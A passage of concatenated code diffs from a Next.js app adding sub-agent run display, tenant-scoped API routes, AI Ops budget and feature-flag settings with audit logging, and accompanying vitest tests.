     return { type: 'data-plan', id: `plan-${threadId}`, data: { steps, updatedBy } };
@@ -12,6 +32,15 @@ export function buildPlanPart(threadId: string, steps: PlanStep[], updatedBy: st
 
 export function buildPhasePart(phase: string, node: string): DataPart {
     return { type: 'data-phase', data: { phase, node, ts: Date.now() } };
+}
+
+/**
+ * Announces the ACTIVE skill for this run — including one auto-selected by
+ * triage, which the composer's own chip cannot know about. Without this part a
+ * correctly-loaded skill is invisible in the UI and reads as a silent failure.
+ */
+export function buildActiveSkillPart(slug: string, source: 'user' | 'auto'): DataPart {
+    return { type: 'data-skill', data: { slug, source } };
 }
 
 export function buildUsagePart(input: number, output: number): DataPart {
@@ -50,6 +79,10 @@ export function buildSubagentPart(event: SubagentEvent): DataPart {
             toolCount: event.toolCount,
             tokensIn: event.tokensIn,
             tokensOut: event.tokensOut,
+            // Server clock at emit time. The client keeps the FIRST ts it sees per
+            // sub-agent as startedAt and ticks elapsed time from its own clock.
+            ts: Date.now(),
+            ...(event.lastTool ? { lastTool: event.lastTool } : {}),
             ...(event.summary ? { summary: event.summary } : {}),
         },
     };

--- a/apps/web-ui/app/api/chat/subagents/[threadId]/route.test.ts
+++ b/apps/web-ui/app/api/chat/subagents/[threadId]/route.test.ts
@@ -1,0 +1,57 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+vi.mock('@/lib/rbac/authorize', () => ({ authorize: vi.fn() }));
+vi.mock('@/lib/auth-session', () => ({ getSessionTenantId: vi.fn() }));
+vi.mock('@/lib/db/repository-factory', () => ({
+    getSubagentRunRepository: vi.fn(),
+}));
+
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getSubagentRunRepository } from '@/lib/db/repository-factory';
+import { GET } from './route';
+
+const params = (threadId: string) => ({ params: Promise.resolve({ threadId }) });
+const listByThread = vi.fn();
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    vi.mocked(authorize).mockResolvedValue(null as never);
+    vi.mocked(getSessionTenantId).mockResolvedValue('t1' as never);
+    vi.mocked(getSubagentRunRepository).mockReturnValue({ save: vi.fn(), listByThread } as never);
+    listByThread.mockResolvedValue([{ subagentId: 'a', role: 'A', transcript: [] }]);
+});
+
+describe('GET /api/chat/subagents/[threadId]', () => {
+    it('returns the thread\'s sub-agent runs', async () => {
+        const body = await (await GET({} as never, params('thread-1'))).json();
+
+        expect(body.success).toBe(true);
+        expect(body.data).toHaveLength(1);
+        expect(listByThread).toHaveBeenCalledWith('t1', 'thread-1');
+    });
+
+    it('propagates an RBAC denial', async () => {
+        const denied = { status: 403 };
+        vi.mocked(authorize).mockResolvedValue(denied as never);
+        expect(await GET({} as never, params('thread-1'))).toBe(denied);
+    });
+
+    it('403s with no tenant context', async () => {
+        vi.mocked(getSessionTenantId).mockResolvedValue(null as never);
+        expect((await GET({} as never, params('thread-1'))).status).toBe(403);
+    });
+
+    // getSessionTenantId THROWS on an unauthenticated session (it does not return
+    // null), so the 403 above is only reachable if the throw is caught and mapped —
+    // otherwise a signed-out caller would get a misleading 500.
+    it('403s when the session lookup throws', async () => {
+        vi.mocked(getSessionTenantId).mockRejectedValue(new Error('Unauthenticated: no valid session'));
+        expect((await GET({} as never, params('thread-1'))).status).toBe(403);
+    });
+
+    it('500s when the repository throws', async () => {
+        listByThread.mockRejectedValue(new Error('db down'));
+        expect((await GET({} as never, params('thread-1'))).status).toBe(500);
+    });
+});

--- a/apps/web-ui/app/api/chat/subagents/[threadId]/route.ts
+++ b/apps/web-ui/app/api/chat/subagents/[threadId]/route.ts
@@ -1,0 +1,42 @@
+import { NextRequest, NextResponse } from 'next/server';
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getSubagentRunRepository } from '@/lib/db/repository-factory';
+
+export async function GET(
+    _request: NextRequest,
+    { params }: { params: Promise<{ threadId: string }> },
+) {
+    console.log('API - GET /api/chat/subagents/[threadId] - Fetching sub-agent runs');
+
+    const authError = await authorize('read', 'Agent');
+    if (authError) return authError;
+
+    try {
+        // getSessionTenantId throws on a missing session/tenant rather than returning
+        // null, so catch it here — a signed-out caller must see 403, not 500.
+        let tenantId: string | null = null;
+        try {
+            tenantId = await getSessionTenantId();
+        } catch {
+            tenantId = null;
+        }
+        if (!tenantId) {
+            return NextResponse.json({ success: false, error: 'No tenant context' }, { status: 403 });
+        }
+
+        const { threadId } = await params;
+        // listByThread goes through getTenantClient and AgentSubagentRun is in
+        // TENANT_SCOPED_MODELS, so the query is tenant-scoped regardless of what
+        // threadId the caller supplies.
+        const runs = await getSubagentRunRepository().listByThread(tenantId, threadId);
+
+        return NextResponse.json({ success: true, data: runs });
+    } catch (error) {
+        console.error('API - Error fetching sub-agent runs:', error);
+        return NextResponse.json(
+            { success: false, error: error instanceof Error ? error.message : 'Failed to fetch sub-agent runs' },
+            { status: 500 },
+        );
+    }
+}

--- a/apps/web-ui/app/api/settings/aiops/route.test.ts
+++ b/apps/web-ui/app/api/settings/aiops/route.test.ts
@@ -1,0 +1,99 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+
+vi.mock('@/lib/rbac/authorize', () => ({ authorize: vi.fn() }));
+vi.mock('@/lib/auth-session', () => ({ getSessionTenantId: vi.fn() }));
+vi.mock('next-auth', () => ({ getServerSession: vi.fn() }));
+vi.mock('@/lib/auth-options', () => ({ authOptions: {} }));
+vi.mock('@/lib/tenant-config-service', () => ({
+    TenantConfigService: { getConfig: vi.fn(), saveConfig: vi.fn() },
+}));
+vi.mock('@/lib/audit-service', () => ({
+    AuditService: { logUserAction: vi.fn().mockResolvedValue(undefined) },
+}));
+
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getServerSession } from 'next-auth';
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import { AuditService } from '@/lib/audit-service';
+import { GET, PUT } from './route';
+
+const putRequest = (body: unknown) =>
+    ({ json: async () => body }) as unknown as Parameters<typeof PUT>[0];
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    process.env.SUBAGENTS_ENABLED = 'true';
+    vi.mocked(authorize).mockResolvedValue(null as never);
+    vi.mocked(getSessionTenantId).mockResolvedValue('t1' as never);
+    vi.mocked(getServerSession).mockResolvedValue({ user: { email: 'a@b.com' } } as never);
+    vi.mocked(TenantConfigService.getConfig).mockResolvedValue(null as never);
+});
+afterEach(() => { delete process.env.SUBAGENTS_ENABLED; });
+
+describe('GET /api/settings/aiops', () => {
+    it('returns the effective budget, bounds, and platform flag', async () => {
+        const body = await (await GET()).json();
+
+        expect(body.success).toBe(true);
+        expect(body.data.platformEnabled).toBe(true);
+        expect(body.data.budget.maxConcurrentSubagents).toBe(3);
+        expect(body.data.bounds.maxConcurrentSubagents.max).toBe(6);
+    });
+
+    it('propagates an RBAC denial', async () => {
+        const denied = { status: 403 };
+        vi.mocked(authorize).mockResolvedValue(denied as never);
+        expect(await GET()).toBe(denied);
+    });
+
+    it('403s with no tenant context', async () => {
+        vi.mocked(getSessionTenantId).mockResolvedValue(null as never);
+        expect((await GET()).status).toBe(403);
+    });
+});
+
+describe('PUT /api/settings/aiops', () => {
+    const valid = {
+        enabled: true, maxConcurrentSubagents: 4, maxSubagentsPerRun: 8,
+        maxSubagentTokensPerRun: 400000, subagentMaxIterations: 8, subagentTimeoutMs: 180000,
+    };
+
+    it('saves a valid payload and audits it', async () => {
+        const res = await PUT(putRequest(valid));
+        const body = await res.json();
+
+        expect(body.success).toBe(true);
+        expect(body.data.budget.maxConcurrentSubagents).toBe(4);
+        expect(TenantConfigService.saveConfig).toHaveBeenCalledWith(
+            'aiops-subagents', expect.objectContaining({ maxConcurrentSubagents: 4 }), 't1', 'a@b.com',
+        );
+        expect(AuditService.logUserAction).toHaveBeenCalled();
+    });
+
+    it('400s on an out-of-range value', async () => {
+        const res = await PUT(putRequest({ ...valid, maxConcurrentSubagents: 999 }));
+        expect(res.status).toBe(400);
+        expect((await res.json()).error).toMatch(/maxConcurrentSubagents/);
+    });
+
+    it('400s when enabled is missing', async () => {
+        const { enabled, ...rest } = valid;
+        expect((await PUT(putRequest(rest))).status).toBe(400);
+    });
+
+    it('persists the clamped value, not the raw one', async () => {
+        process.env.SUBAGENT_MAX_CONCURRENCY = '2';
+        await PUT(putRequest({ ...valid, maxConcurrentSubagents: 2 }));
+        expect(TenantConfigService.saveConfig).toHaveBeenCalledWith(
+            'aiops-subagents', expect.objectContaining({ maxConcurrentSubagents: 2 }), 't1', 'a@b.com',
+        );
+        delete process.env.SUBAGENT_MAX_CONCURRENCY;
+    });
+
+    it('propagates an RBAC denial', async () => {
+        const denied = { status: 403 };
+        vi.mocked(authorize).mockResolvedValue(denied as never);
+        expect(await PUT(putRequest(valid))).toBe(denied);
+    });
+});

--- a/apps/web-ui/app/api/settings/aiops/route.ts
+++ b/apps/web-ui/app/api/settings/aiops/route.ts
@@ -1,0 +1,101 @@
+import { NextRequest, NextResponse } from 'next/server';
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getServerSession } from 'next-auth';
+import { authOptions } from '@/lib/auth-options';
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import { AuditService } from '@/lib/audit-service';
+import {
+    SUBAGENT_CONFIG_KEY,
+    BUDGET_BOUNDS,
+    clampBudget,
+    platformSubagentsEnabled,
+    resolveSubagentBudget,
+    validateBudgetInput,
+} from '@/lib/agent/subagent-budget';
+
+export async function GET() {
+    console.log('API - GET /api/settings/aiops - Fetching sub-agent budget');
+
+    const authError = await authorize('read', 'Agent');
+    if (authError) return authError;
+
+    try {
+        const tenantId = await getSessionTenantId();
+        if (!tenantId) {
+            return NextResponse.json({ success: false, error: 'No tenant context' }, { status: 403 });
+        }
+
+        const budget = await resolveSubagentBudget(tenantId);
+
+        return NextResponse.json({
+            success: true,
+            data: {
+                budget,
+                // The UI renders sliders bounded by these, and explains why a
+                // ceiling is what it is rather than silently clipping input.
+                bounds: BUDGET_BOUNDS,
+                platformEnabled: platformSubagentsEnabled(),
+            },
+        });
+    } catch (error) {
+        console.error('API - Error fetching AI Ops settings:', error);
+        return NextResponse.json(
+            { success: false, error: error instanceof Error ? error.message : 'Failed to fetch AI Ops settings' },
+            { status: 500 },
+        );
+    }
+}
+
+export async function PUT(request: NextRequest) {
+    console.log('API - PUT /api/settings/aiops - Saving sub-agent budget');
+
+    const authError = await authorize('update', 'Agent');
+    if (authError) return authError;
+
+    try {
+        const tenantId = await getSessionTenantId();
+        if (!tenantId) {
+            return NextResponse.json({ success: false, error: 'No tenant context' }, { status: 403 });
+        }
+
+        const body = await request.json();
+        const validationError = validateBudgetInput(body);
+        if (validationError) {
+            return NextResponse.json({ success: false, error: validationError }, { status: 400 });
+        }
+
+        // Persist the CLAMPED value so a stored row can never exceed the ceiling
+        // that was in force when it was written.
+        const budget = clampBudget(body);
+
+        const session = await getServerSession(authOptions);
+        const updatedBy = session?.user?.email || 'api-user';
+
+        await TenantConfigService.saveConfig(SUBAGENT_CONFIG_KEY, budget, tenantId, updatedBy);
+
+        await AuditService.logUserAction({
+            eventType: 'aiops.subagents.settings.updated',
+            severity: 'medium',
+            apiRoute: 'PUT /api/settings/aiops',
+            httpMethod: 'PUT',
+            action: 'Update AI Ops Sub-Agent Settings',
+            resourceType: 'settings',
+            resourceId: SUBAGENT_CONFIG_KEY,
+            resourceName: 'AI Ops Sub-Agent Budget',
+            user: updatedBy,
+            userType: 'user',
+            status: 'success',
+            details: `Sub-agents ${budget.enabled ? 'enabled' : 'disabled'}; concurrency=${budget.maxConcurrentSubagents}, perRun=${budget.maxSubagentsPerRun}, tokenBudget=${budget.maxSubagentTokensPerRun}`,
+            tenantId,
+        });
+
+        return NextResponse.json({ success: true, data: { budget } });
+    } catch (error) {
+        console.error('API - Error saving AI Ops settings:', error);
+        return NextResponse.json(
+            { success: false, error: error instanceof Error ? error.message : 'Failed to save AI Ops settings' },
+            { status: 500 },
+        );
+    }
+}

--- a/apps/web-ui/app/api/settings/aiops/route.ts
+++ b/apps/web-ui/app/api/settings/aiops/route.ts
@@ -13,6 +13,14 @@ import {
     resolveSubagentBudget,
     validateBudgetInput,
 } from '@/lib/agent/subagent-budget';
+import {
+    AIOPS_FEATURES_KEY,
+    FEATURE_BOUNDS,
+    clampFeatures,
+    resolveAiopsFeatures,
+    validateFeaturesInput,
+    primeAiopsFeaturesCache,
+} from '@/lib/agent/aiops-features';
 
 export async function GET() {
     console.log('API - GET /api/settings/aiops - Fetching sub-agent budget');
@@ -27,6 +35,7 @@ export async function GET() {
         }
 
         const budget = await resolveSubagentBudget(tenantId);
+        const features = await resolveAiopsFeatures(tenantId);
 
         return NextResponse.json({
             success: true,
@@ -36,6 +45,8 @@ export async function GET() {
                 // ceiling is what it is rather than silently clipping input.
                 bounds: BUDGET_BOUNDS,
                 platformEnabled: platformSubagentsEnabled(),
+                features,
+                featureBounds: FEATURE_BOUNDS,
             },
         });
     } catch (error) {
@@ -60,6 +71,38 @@ export async function PUT(request: NextRequest) {
         }
 
         const body = await request.json();
+
+        // { features: {...} } saves the feature flags; a budget-shaped body keeps
+        // the original sub-agent semantics (backward compatible).
+        if (body && typeof body === 'object' && 'features' in body) {
+            const featError = validateFeaturesInput(body.features);
+            if (featError) {
+                return NextResponse.json({ success: false, error: featError }, { status: 400 });
+            }
+            const features = clampFeatures(body.features);
+            const session = await getServerSession(authOptions);
+            const updatedBy = session?.user?.email || 'api-user';
+            await TenantConfigService.saveConfig(AIOPS_FEATURES_KEY, features, tenantId, updatedBy);
+            // Apply immediately on this replica; others converge within the cache TTL.
+            primeAiopsFeaturesCache(tenantId, features);
+            await AuditService.logUserAction({
+                eventType: 'aiops.features.settings.updated',
+                severity: 'medium',
+                apiRoute: 'PUT /api/settings/aiops',
+                httpMethod: 'PUT',
+                action: 'Update AI Ops Feature Settings',
+                resourceType: 'settings',
+                resourceId: AIOPS_FEATURES_KEY,
+                resourceName: 'AI Ops Features',
+                user: updatedBy,
+                userType: 'user',
+                status: 'success',
+                details: `triage=${features.chatTriageEnabled} workingMem=${features.workingMemoryEnabled} episodic=${features.episodicMemoryEnabled} procedural=${features.proceduralMemoryEnabled} reconcile=${features.memoryReconcileEnabled} autoSkill=${features.autoSkillCreationEnabled} minRules=${features.skillSynthesisMinRules} maxIterations=${features.maxIterations}`,
+                tenantId,
+            });
+            return NextResponse.json({ success: true, data: { features } });
+        }
+
         const validationError = validateBudgetInput(body);
         if (validationError) {
             return NextResponse.json({ success: false, error: validationError }, { status: 400 });

--- a/apps/web-ui/app/app/agent-ops/settings/subagents/page.tsx
+++ b/apps/web-ui/app/app/agent-ops/settings/subagents/page.tsx
@@ -1,10 +1,12 @@
 'use client';
 
 import { AiopsSubagentSettings } from '@/components/settings/aiops-subagent-settings';
+import { AiopsFeatureSettings } from '@/components/settings/aiops-feature-settings';
 
 export default function AiopsSubagentSettingsPage() {
   return (
-    <div className="flex-1 bg-background p-6">
+    <div className="flex-1 space-y-6 bg-background p-6">
+      <AiopsFeatureSettings />
       <AiopsSubagentSettings />
     </div>
   );

--- a/apps/web-ui/app/app/agent-ops/settings/subagents/page.tsx
+++ b/apps/web-ui/app/app/agent-ops/settings/subagents/page.tsx
@@ -1,0 +1,11 @@
+'use client';
+
+import { AiopsSubagentSettings } from '@/components/settings/aiops-subagent-settings';
+
+export default function AiopsSubagentSettingsPage() {
+  return (
+    <div className="flex-1 bg-background p-6">
+      <AiopsSubagentSettings />
+    </div>
+  );
+}

--- a/apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx
+++ b/apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx
@@ -1,8 +1,26 @@
 // @vitest-environment jsdom
-import { describe, it, expect } from 'vitest'
-import { render, screen } from '@testing-library/react'
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render as rtlRender, screen, waitFor } from '@testing-library/react'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
 import { RunRail, deriveStepTitle } from '../run-rail'
 import type { RunState } from '../run-state'
+
+// SubagentCard reads persisted transcripts through TanStack Query, so every rail
+// render needs a client. Fetch is stubbed per-test; the default is an empty thread.
+const fetchMock = vi.fn()
+
+const render = (ui: React.ReactElement) => {
+  const client = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+  return rtlRender(<QueryClientProvider client={client}>{ui}</QueryClientProvider>)
+}
+
+beforeEach(() => {
+  fetchMock.mockReset()
+  fetchMock.mockResolvedValue({ ok: true, json: async () => ({ success: true, data: [] }) })
+  vi.stubGlobal('fetch', fetchMock)
+})
+
+afterEach(() => vi.unstubAllGlobals())
 
 const EMPTY_RUN_STATE: RunState = {
   plan: [],
@@ -15,6 +33,7 @@ const EMPTY_RUN_STATE: RunState = {
   hasApprovalData: false,
   tokenUsage: { input: 0, output: 0 },
   subagents: [],
+  usedSubagents: false,
 }
 
 const CONTEXT = { accountNames: [], modelLabel: '', skillName: null, toolCount: null, kbLabel: 'No knowledge base' }
@@ -108,6 +127,7 @@ describe('RunRail', () => {
   it('renders one card per sub-agent and counts only the running ones in the heading', () => {
     const runState: RunState = {
       ...EMPTY_RUN_STATE,
+      usedSubagents: true,
       subagents: [
         { id: 's1', role: 'EC2 scanner', task: 'Scan EC2', status: 'running', toolCount: 2, tokensIn: 100, tokensOut: 20 },
         { id: 's2', role: 'RDS scanner', task: 'Scan RDS', status: 'done', toolCount: 5, tokensIn: 900, tokensOut: 80, summary: 'found it' },
@@ -123,6 +143,46 @@ describe('RunRail', () => {
   it('renders no sub-agent section when the run dispatched none', () => {
     render(<RunRail runState={EMPTY_RUN_STATE} isStreaming={false} context={CONTEXT} />)
     expect(screen.queryByText(/^Sub-agents/)).toBeNull()
+  })
+
+  // data-subagent parts are not persisted, so a reloaded thread arrives with an
+  // empty `subagents` list. Without this reconstruction the cards — and the
+  // transcripts Task 11 persists — would be unreachable after a refresh.
+  it('rebuilds the sub-agent cards from persisted runs after a reload', async () => {
+    fetchMock.mockResolvedValue({
+      ok: true,
+      json: async () => ({
+        success: true,
+        data: [{
+          subagentId: 's1', role: 'EC2 scanner', task: 'Scan EC2', status: 'done',
+          toolCount: 4, tokensIn: 800, tokensOut: 60, summary: 'found it',
+          transcript: [{ kind: 'ai', text: 'looked around' }],
+        }],
+      }),
+    })
+
+    render(<RunRail runState={{ ...EMPTY_RUN_STATE, usedSubagents: true }} isStreaming={false} context={CONTEXT} threadId="thread-1" />)
+
+    await waitFor(() => expect(fetchMock).toHaveBeenCalledWith('/api/chat/subagents/thread-1'))
+    expect(await screen.findByText('EC2 scanner')).toBeTruthy()
+    expect(screen.getByText('Sub-agents (0 running)')).toBeTruthy()
+  })
+
+  it('does not fetch persisted runs for a thread that never dispatched', () => {
+    render(<RunRail runState={EMPTY_RUN_STATE} isStreaming={false} context={CONTEXT} threadId="thread-1" />)
+    expect(fetchMock).not.toHaveBeenCalled()
+  })
+
+  it('prefers live sub-agent state over a persisted fetch while streaming', () => {
+    const runState: RunState = {
+      ...EMPTY_RUN_STATE,
+      usedSubagents: true,
+      subagents: [{ id: 's1', role: 'EC2 scanner', task: 'Scan EC2', status: 'running', toolCount: 1, tokensIn: 10, tokensOut: 1 }],
+    }
+    render(<RunRail runState={runState} isStreaming context={CONTEXT} threadId="thread-1" />)
+
+    expect(screen.getByText('Sub-agents (1 running)')).toBeTruthy()
+    expect(fetchMock).not.toHaveBeenCalled()
   })
 
   it('still shows the pending-approval status row', () => {

--- a/apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx
+++ b/apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx
@@ -14,6 +14,7 @@ const EMPTY_RUN_STATE: RunState = {
   hasStructuredData: false,
   hasApprovalData: false,
   tokenUsage: { input: 0, output: 0 },
+  subagents: [],
 }
 
 const CONTEXT = { accountNames: [], modelLabel: '', skillName: null, toolCount: null, kbLabel: 'No knowledge base' }
@@ -102,6 +103,26 @@ describe('RunRail', () => {
     }
     render(<RunRail runState={runState} isStreaming context={CONTEXT} />)
     expect(screen.queryByText('Generating...')).toBeNull()
+  })
+
+  it('renders one card per sub-agent and counts only the running ones in the heading', () => {
+    const runState: RunState = {
+      ...EMPTY_RUN_STATE,
+      subagents: [
+        { id: 's1', role: 'EC2 scanner', task: 'Scan EC2', status: 'running', toolCount: 2, tokensIn: 100, tokensOut: 20 },
+        { id: 's2', role: 'RDS scanner', task: 'Scan RDS', status: 'done', toolCount: 5, tokensIn: 900, tokensOut: 80, summary: 'found it' },
+      ],
+    }
+    render(<RunRail runState={runState} isStreaming context={CONTEXT} />)
+
+    expect(screen.getByText('Sub-agents (1 running)')).toBeTruthy()
+    expect(screen.getByText('EC2 scanner')).toBeTruthy()
+    expect(screen.getByText('RDS scanner')).toBeTruthy()
+  })
+
+  it('renders no sub-agent section when the run dispatched none', () => {
+    render(<RunRail runState={EMPTY_RUN_STATE} isStreaming={false} context={CONTEXT} />)
+    expect(screen.queryByText(/^Sub-agents/)).toBeNull()
   })
 
   it('still shows the pending-approval status row', () => {

--- a/apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx
+++ b/apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx
@@ -135,7 +135,7 @@ describe('RunRail', () => {
     }
     render(<RunRail runState={runState} isStreaming context={CONTEXT} />)
 
-    expect(screen.getByText('Sub-agents (1 running)')).toBeTruthy()
+    expect(screen.getByText(/^Sub-agents \(1 running/)).toBeTruthy()
     expect(screen.getByText('EC2 scanner')).toBeTruthy()
     expect(screen.getByText('RDS scanner')).toBeTruthy()
   })
@@ -165,12 +165,13 @@ describe('RunRail', () => {
 
     await waitFor(() => expect(fetchMock).toHaveBeenCalledWith('/api/chat/subagents/thread-1'))
     expect(await screen.findByText('EC2 scanner')).toBeTruthy()
-    expect(screen.getByText('Sub-agents (0 running)')).toBeTruthy()
+    expect(screen.getByText(/^Sub-agents \(0 running/)).toBeTruthy()
   })
 
   it('does not fetch persisted runs for a thread that never dispatched', () => {
     render(<RunRail runState={EMPTY_RUN_STATE} isStreaming={false} context={CONTEXT} threadId="thread-1" />)
-    expect(fetchMock).not.toHaveBeenCalled()
+    // The settings fetch (Context line) is allowed; the sub-agent store fetch is not.
+    expect(fetchMock).not.toHaveBeenCalledWith('/api/chat/subagents/thread-1')
   })
 
   it('prefers live sub-agent state over a persisted fetch while streaming', () => {
@@ -181,8 +182,8 @@ describe('RunRail', () => {
     }
     render(<RunRail runState={runState} isStreaming context={CONTEXT} threadId="thread-1" />)
 
-    expect(screen.getByText('Sub-agents (1 running)')).toBeTruthy()
-    expect(fetchMock).not.toHaveBeenCalled()
+    expect(screen.getByText(/^Sub-agents \(1 running/)).toBeTruthy()
+    expect(fetchMock).not.toHaveBeenCalledWith('/api/chat/subagents/thread-1')
   })
 
   it('still shows the pending-approval status row', () => {
@@ -195,5 +196,54 @@ describe('RunRail', () => {
     }
     render(<RunRail runState={runState} isStreaming={false} context={CONTEXT} />)
     expect(screen.getByText('Awaiting approval')).toBeTruthy()
+  })
+})
+
+// REGRESSION GUARD: a stream that dies mid-fan-out leaves live cards frozen at
+// "running" — the terminal event was persisted server-side but never reached the
+// client. Once streaming stops, the rail must reconcile those cards from
+// agent_subagent_runs instead of spinning forever on a dead run.
+describe('RunRail sub-agent reconciliation after stream death', () => {
+  const liveRunning = {
+    id: 'sa-9', role: 'EC2 auditor — 123456789012', task: 'audit', status: 'running' as const,
+    toolCount: 5, tokensIn: 100, tokensOut: 50,
+  }
+
+  it('overrides a stale running card with the persisted terminal status', async () => {
+    fetchMock.mockResolvedValue({
+      ok: true,
+      json: async () => ({
+        success: true,
+        data: [{
+          subagentId: 'sa-9', role: 'EC2 auditor — 123456789012', task: 'audit', status: 'failed',
+          toolCount: 17, tokensIn: 20000, tokensOut: 6800, summary: 'Model invocation was aborted.', transcript: null,
+        }],
+      }),
+    })
+    render(
+      <RunRail
+        runState={{ ...EMPTY_RUN_STATE, usedSubagents: true, subagents: [liveRunning] }}
+        isStreaming={false}
+        context={CONTEXT}
+        threadId="thread-1"
+      />,
+    )
+    await waitFor(() => {
+      expect(screen.getByText(/0 running/)).toBeTruthy()
+    })
+    // The abort is presented as a cancellation, not a sub-agent mistake.
+    expect(screen.getByText(/Cancelled — the run was stopped/)).toBeTruthy()
+  })
+
+  it('leaves live running cards alone while the stream is still open', () => {
+    render(
+      <RunRail
+        runState={{ ...EMPTY_RUN_STATE, usedSubagents: true, subagents: [liveRunning] }}
+        isStreaming
+        context={CONTEXT}
+        threadId="thread-1"
+      />,
+    )
+    expect(screen.getByText(/1 running/)).toBeTruthy()
   })
 })

--- a/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
+++ b/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
@@ -7,6 +7,8 @@ const msg = (parts: Array<{ type: string; data?: unknown; text?: string }>) =>
 const msgWithId = (id: string, parts: Array<Record<string, unknown> & { type: string }>) =>
     ({ role: 'assistant', id, parts });
 
+const subagentPart = (data: Record<string, unknown>) => ({ type: 'data-subagent', data });
+
 describe('deriveRunState', () => {
     it('takes the LAST data-plan part as the live plan', () => {
         const rs = deriveRunState([
@@ -259,5 +261,38 @@ describe('deriveRunState token usage', () => {
     it('defaults to zero when there are no data-usage parts', () => {
         const state = deriveRunState([asst([{ type: 'text', text: 'hi' }])], new Set());
         expect(state.tokenUsage).toEqual({ input: 0, output: 0 });
+    });
+});
+
+describe('deriveRunState — subagents', () => {
+    it('collects sub-agents in first-seen order', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+            subagentPart({ id: 'b', role: 'B', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+        ])] as any, new Set());
+
+        expect(state.subagents.map(s => s.id)).toEqual(['a', 'b']);
+    });
+
+    it('replaces an earlier update for the same id rather than duplicating', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'running', toolCount: 1, tokensIn: 10, tokensOut: 2 }),
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'done', toolCount: 5, tokensIn: 900, tokensOut: 80, summary: 'found it' }),
+        ])] as any, new Set());
+
+        expect(state.subagents).toHaveLength(1);
+        expect(state.subagents[0]).toMatchObject({ status: 'done', toolCount: 5, summary: 'found it' });
+    });
+
+    it('marks the run as having structured data', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+        ])] as any, new Set());
+
+        expect(state.hasStructuredData).toBe(true);
+    });
+
+    it('returns an empty list when no sub-agent parts are present', () => {
+        expect(deriveRunState([msg([{ type: 'text', text: 'hi' }])] as any, new Set()).subagents).toEqual([]);
     });
 });

--- a/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
+++ b/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
@@ -296,3 +296,47 @@ describe('deriveRunState — subagents', () => {
         expect(deriveRunState([msg([{ type: 'text', text: 'hi' }])] as any, new Set()).subagents).toEqual([]);
     });
 });
+
+// data-subagent parts are NOT persisted (history is rebuilt from the LangGraph
+// checkpointer), so after a reload `subagents` is empty even for a thread that
+// fanned out. The dispatch_agent tool call IS persisted, and it is what tells the
+// rail to reconstruct the cards from agent_subagent_runs instead of showing nothing.
+describe('deriveRunState — usedSubagents', () => {
+    it('is false for a thread that never dispatched', () => {
+        expect(deriveRunState([msg([{ type: 'text', text: 'hi' }])] as any, new Set()).usedSubagents).toBe(false);
+    });
+
+    it('is true from a live data-subagent part', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'done', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+        ])] as any, new Set());
+
+        expect(state.usedSubagents).toBe(true);
+    });
+
+    it('is true from a reloaded dispatch_agent tool part, whose data parts are gone', () => {
+        // Shape emitted by /api/threads/[threadId]/history on reload.
+        const state = deriveRunState([msg([
+            { type: 'tool-invocation', toolCallId: 'c1', toolName: 'dispatch_agent', state: 'call' } as any,
+        ])] as any, new Set());
+
+        expect(state.subagents).toEqual([]);
+        expect(state.usedSubagents).toBe(true);
+    });
+
+    it('is true from the streamed typed tool part name', () => {
+        const state = deriveRunState([msg([
+            { type: 'tool-dispatch_agent', toolCallId: 'c1', state: 'output-available', output: 'report' } as any,
+        ])] as any, new Set());
+
+        expect(state.usedSubagents).toBe(true);
+    });
+
+    it('is not tripped by an unrelated tool', () => {
+        const state = deriveRunState([msg([
+            { type: 'tool-invocation', toolCallId: 'c1', toolName: 'aws_read', state: 'call' } as any,
+        ])] as any, new Set());
+
+        expect(state.usedSubagents).toBe(false);
+    });
+});

--- a/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
+++ b/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
@@ -356,3 +356,33 @@ describe('deriveRunState — usedSubagents', () => {
         expect(state.usedSubagents).toBe(false);
     });
 });
+
+// startedAt must be STICKY (first part's ts survives later updates — otherwise the
+// elapsed timer restarts on every progress tick) and lastTool must track the
+// latest part so the card's action line stays current.
+describe('deriveRunState sub-agent live details', () => {
+    const partFor = (data: Record<string, unknown>) => ({
+        role: 'assistant',
+        parts: [{ type: 'data-subagent', data }],
+    });
+
+    it('keeps the first ts as startedAt across updates and tracks lastTool', () => {
+        const base = { id: 'sa-1', role: 'r', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 };
+        const state = deriveRunState([
+            partFor({ ...base, ts: 1000 }),
